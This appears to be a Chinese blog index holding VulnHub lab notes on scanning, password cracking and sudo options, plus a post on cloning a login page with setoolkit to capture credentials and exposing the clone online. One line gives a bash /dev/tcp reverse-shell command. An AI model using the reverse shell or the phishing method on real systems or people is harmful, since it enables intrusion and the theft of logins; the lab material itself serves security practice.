[VulnHub]第二章

本章靶场:Corrosion系列 kali上的目录扫描字典 经过几次vulnhub打靶后发现kali上的目录扫描器可谓是五花八门,一些靶场甚至会出现没有使用指定扫描器就没有正确结果的情况 以下是整理的一些常用字典目录,当然可能有疏漏的地方,但也足以应付大部分场景 #除了默认扫描外,绝对目录均为/usr dirsearch默认扫描 nikto默认扫描 ../share/dirb ../share/dirbuster ../wordlist Bash -i 这个参数的作用是创建一个新的bash交互 但真正实用的是下面这句反弹shell bash -i >& /dev/tcp/IP地址/端口 0>&1 具体分析可以看这里 fcrackzip 这是一个压缩包密码爆破工具。可以使用自定义字符组合 fcrackzip -b -c 'aA1' -l 1-10 -u 123lybbn.zip -b 表示使用暴利破解的方式 -c ‘aA1’ 表示使用大小写字母和数字混合破解的方式 -l 1-10 表示需要破解的密码长度为1到10位 -u 表示只显示破解出来的密码,其他错误的密码不显示出 fcrackzip -D -p lybbnpass.txt -u 123lybbn.zip -D 表示要使用字典破解 -p 表示要使用那个字典破解 nano 我自己本人经常死脑筋只会用vim或者vi来修改文件,但其实很多靶机都会有这个坑,就是没有vi系列,只能用nano UID、GID、EUID、EGID、SUID、SGID 内容比较多,简单说一下 UID是当前实际用户,GID是当前用户组,EUID是文件有效用户,EGID是文件有效用户组 而SUID和SGID更像是设置“全局变量”(其实我也还不太理解,因为暂时没怎么用到),感兴趣的可以看这里 硬链接和软链接 简单来说,在linux文件结构中,硬链接更像是一个“实时同步”,并且即便源文件被删除了也并不影响同步文件的读取。而软链接可以理解成windows系统下的快捷方式。更多细节可以看这里

July 23, 2023 · 1 min · Red

[VulnHub]第一章

本期靶场:EMPIRE系列 getcap和setcap 内容比较复杂,看这里 大概就是可以了解一些文件的操作权限是什么,比如一个有root读取权限的可执行文件就能利用 netdiscover 一句命令即可查完内网存活主机,比nmap快n倍 dirb 目录扫描,dirsearch可以平替,但两者字典库不一定一样 enum4linux 用来枚举已开启SMB服务的linux主机用户 wfuzz 模糊路径搜索器,和dirsearch最大区别就在于能够指定一些参数和模糊路径,例如枚举/~myfiles这样的东西。具体用法看这里 ffuf 也是一个模糊搜索工具,不一样的地方在于这个工具是可以自己选择后缀名的 什么意思呢,比如用wfuzz扫http://192.168.2.17/~secret/.FUZZ这个链接,结果只能是某个目录,而如果使用ffuf,则可以扫描到名叫FUZZ的某个文件html,txt,php等各种可自定义后缀的文件 Base家族 凡是带有=填充符,base64要是不行就试试58或者其他的 ssh2john 这是一个ssh私钥处理脚本,在使用john进行ssh私钥爆破时需要先用这个脚本处理 sudo -V 显示版本编号 -h 会显示版本编号及指令的使用方式说明 -l 显示出自己(执行 sudo 的使用者)的权限 -v 因为 sudo 在第一次执行时或是在 N 分钟内没有执行(N 预设为五)会问密码,这个参数是重新做一次确认,如果超过 N 分钟,也会问密码 -k 将会强迫使用者在下一次执行 sudo 时问密码(不论有没有超过 N 分钟) -b 将要执行的指令放在背景执行 -p prompt 可以更改问密码的提示语,其中 %u 会代换为使用者的帐号名称, %h 会显示主机名称 -u username/#uid 不加此参数,代表要以 root 的身份执行指令,而加了此参数,可以以 username 的身份执行指令(#uid 为该 username 的使用者号码) -s 执行环境变数中的 SHELL 所指定的 shell ,或是 /etc/passwd 里所指定的 shell ...

July 5, 2023 · 1 min · Red

Red的钓鱼网站

方法 要想制作一个钓鱼网站,就需要满足以下几点条件: 1)一个与原网站高度相似的html页面 2)一台能够与受害者主机有直接或间接联系的终端 虽然看着简单,但单要完成第一步可以说就已经让一些人够呛。所以,想要在Windows上用一般的方法来实现这一目的,显然是比较复杂的。所以Red便下意识地将目光转向了kali。好在kali集成了一款十分强大的工具setoolkit 下面就是我们今天的犯罪嫌疑人Red的操作步骤 在kali命令行中输入setoolkit,就可以打开这一工具。第一次打开需要输入y来进行工具依赖的安装 会出现以下内容 拉到下方,会出现如下内容 翻译后内容如下 社会工程学攻击 快速追踪测试 第三方模块 升级软件 升级配置 帮助 输入1 鱼叉式网络攻击 网页攻击 传染媒介式 建立payload和listener 邮件群发攻击 Arduino基础攻击 无线接入点攻击 二维码攻击 Powershell攻击 第三反方模块 输入2 Java applet攻击 Metasploit浏览器攻击 钓鱼网站攻击 标签钓鱼攻击 网站jacking攻击 多种网站攻击 全屏幕攻击 输入3 网站模板 站点克隆 用自己的网站 输入2,这里进行网站克隆,默认状态下对本地ip回车即可,将oj的登陆网站输入进来,等待捕获输入信息即可。这里用账号:admin,密码:IST22006来输入,可以看到如下内容 可以看到成功捕获,钓鱼网站制作成功~ 怎样让外网访问到? 这就需要用到一种技术:内网穿透 内网穿透的目的是:让外网能访问你本地的应用,例如在外网打开你本地http://127.0.0.1 指向的Web站点。 那怎么才能实现内网穿透呢?现有工具有花生壳,natapp,小米球工具,前两个都是收费的,最后一个生成的域名前缀是自己设置的,穿透域名是xx.ngrok.xiaomiqiu.cn.有兴趣的可以玩一下。

November 15, 2022 · 1 min · Red